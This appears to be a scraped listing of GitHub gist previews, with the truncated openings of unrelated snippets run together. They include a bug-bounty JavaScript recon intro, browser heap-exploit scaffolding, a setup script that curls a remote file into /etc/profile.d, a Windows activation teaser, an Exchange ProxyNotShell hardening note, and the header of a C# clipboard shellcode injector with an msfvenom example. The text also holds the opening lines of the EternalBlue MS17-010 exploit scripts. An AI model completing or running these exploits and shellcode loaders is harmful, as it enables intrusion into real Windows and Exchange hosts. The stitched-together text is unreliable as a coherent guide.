This is a simple guide to perform javascript recon in the bugbounty
- The first step is to collect possibly several javascript files (
more files
=more paths,parameters
->more vulns
)
@echo off & setlocal | |
if "%~1"=="" exit /b | |
if /i "%~x1" neq ".bat" if /i "%~x1" neq ".cmd" exit /b | |
<"%~1" ((for /l %%N in (1 1 8) do pause)>nul&findstr "^">"%~n1__%~x1") |
function sleep( sleepDuration ){ | |
var now = new Date().getTime(); | |
while(new Date().getTime() < now + sleepDuration){ /* do nothing */ } | |
} | |
function gc() { | |
for (let i = 0; i < 0x10; i++) { | |
new ArrayBuffer(0x1000000); | |
} | |
} | |
let data_view = new DataView(new ArrayBuffer(8)); |
# Requirements | |
sudo apt install curl apt-transport-https unzip wget libcap2-bin software-properties-common lsb-release -y | |
sudo apt install gpgv gpgsm gnupg-l10n gnupg dirmngr -y | |
add-apt-repository ppa:openjdk-r/ppa | |
sudo apt update -y | |
sudo curl -so /etc/profile.d/myenvvars.sh https://gist.githubusercontent.com/austinsonger/2385ff1ef5ccb014aaed4d8684dd6e54/raw/e1d9b85b3383d1a50a54eac68ab7ad7c3e0c2797/myenvvars.sh | |
export JAVA_HOME=/usr/ | |
sudo apt install openjdk-11-jdk -y | |
# Wazuh Prep |
An guide how to activate Windows 10 AND 11 Pro for free
Your Windows license will expire soon
or something that way. What do i do?<# block non-Exchange admins from PowerShell access in Exchange | |
ProxyNotShell | |
CVE-2022-41040 | |
CVE-2022-41082f | |
some bypasses have been found for the IIS block rules. | |
need to hard block PowerShell for those that don't **need** it. | |
Exchange allows PowerShell by default, block by exception. Not ideal, but workable. |
// Using the clipboard as your code cave. | |
// Generate your shellcode with msfvenom or whatever | |
// Example: msfvenom -p windows/x64/exec CMD=calc exitfunc=thread -f raw -o <outputfile.bin> | |
// Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\ClippyShellcodeInject.cs | |
using System; | |
using System.IO; | |
using System.Runtime.InteropServices; | |
namespace ClippySCInject |
# This file has no update anymore. Please see https://github.com/worawit/MS17-010 | |
import sys | |
from struct import pack | |
if len(sys.argv) < 4: | |
print('Usage: {} sc_x86 sc_x64 sc_out'.format(sys.argv[0])) | |
sys.exit() | |
sc_x86 = open(sys.argv[1], 'rb').read() | |
sc_x64 = open(sys.argv[2], 'rb').read() |
#!/usr/bin/python | |
# This file has no update anymore. Please see https://github.com/worawit/MS17-010 | |
from impacket import smb, ntlm | |
from struct import pack | |
import sys | |
import socket | |
''' | |
EternalBlue exploit for Windows 8 and 2012 by sleepya | |
The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
#!/usr/bin/python | |
# This file has no update anymore. Please see https://github.com/worawit/MS17-010 | |
from impacket import smb | |
from struct import pack | |
import sys | |
import socket | |
''' | |
EternalBlue exploit for Windows 7/2008 by sleepya | |
The exploit might FAIL and CRASH a target system (depended on what is overwritten) |